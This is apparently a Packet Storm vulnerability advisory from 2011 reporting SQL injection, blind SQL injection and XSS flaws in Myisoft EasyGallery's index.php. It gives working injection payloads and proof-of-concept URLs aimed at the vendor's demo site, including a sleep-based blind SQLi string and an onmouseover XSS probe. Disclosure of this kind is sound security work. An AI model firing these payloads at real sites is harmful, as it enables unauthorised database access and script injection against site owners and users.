Myisoft EasyGallery suffers from cross site scripting and remote blind SQL injection vulnerabilities.
eefd3753d650c65093d4742cd3f2aa25ab520803062e4d04842dc6fbbf73a991# Exploit Title: MYISOFT EasyGallery SQL Injection - Blind SQL
Injection - Stored XSS
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr
ISSUE
SQL Injection, Blind SQL Injection and XSS can be done using the command input
Vulnerable Page:
index.php
Example:
index.php?do=<SQL Injection Code>&page=register&PageSection=0
index.php?catid=<SQL Injection Code>&page=category&PageSection=0
index.php/<XSS Code>
index.php?Go=Go&page=search&search=<Blind SQL Injection>
Exploit:
index.php?catid=1'&page=category&PageSection=0
index.php/%27onmouseover=prompt(932505)%3E
index.php?Go=Go&page=search&search=1' or (sleep(2)%2b1) limit 1 --
POC:
http://myiosoft.com/products/EasyGallery/demo/staticpages/easygallery/index.php?catid=1'&page=category&PageSection=0
http://myiosoft.com/products/EasyGallery/demo/staticpages/easygallery/index.php/%27onmouseover=prompt(932505)%3E
http://myiosoft.com/products/EasyGallery/demo/staticpages/easygallery/index.php?Go=Go&page=search&search=1' or (sleep(2)%2b1) limit 1
--
Thanks,
Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed